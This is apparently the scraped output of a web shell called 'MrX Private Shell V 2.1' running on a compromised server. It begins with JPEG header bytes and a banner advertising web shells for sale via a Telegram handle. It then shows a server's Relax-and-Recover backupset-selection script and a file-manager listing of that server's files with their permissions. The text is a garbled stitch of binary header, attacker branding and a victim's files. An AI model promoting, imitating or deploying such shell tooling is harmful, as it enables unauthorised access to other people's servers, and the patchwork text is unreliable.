����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#
# show the last job that ran
# if no backupset is defined, query the user for it
if ! test "$GALAXY7_BACKUPSET" ; then
let c=0 ; while read ; do backupsets[c++]="$REPLY" ; done < <(
qlist backupset -c $HOSTNAME -a Q_LINUX_FS
)
LogPrint "
Found the following backupsets:
$(
for ((d=0 ; d<c ; d++)) ; do
echo " [$d] ${backupsets[d]}"
done
)"
# Use the original STDIN STDOUT and STDERR when rear was launched by the user
# to get input from the user and to show output to the user (cf. _input-output-functions.sh):
read -p "Please select the backupset to use: " answer 0<&6 1>&7 2>&8
test $answer -ge 0 -a $answer -lt $c ||\
Error "You must specify the backupset with its number."
GALAXY7_BACKUPSET="${backupsets[answer]}"
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 400_start_galaxy_daemons.sh | File | 454 B | 0644 |
|
| 410_ping_commcell.sh | File | 491 B | 0644 |
|
| 420_login_to_galaxy_and_setup_environment.sh | File | 761 B | 0644 |
|
| 500_select_backupset.sh | File | 753 B | 0644 |
|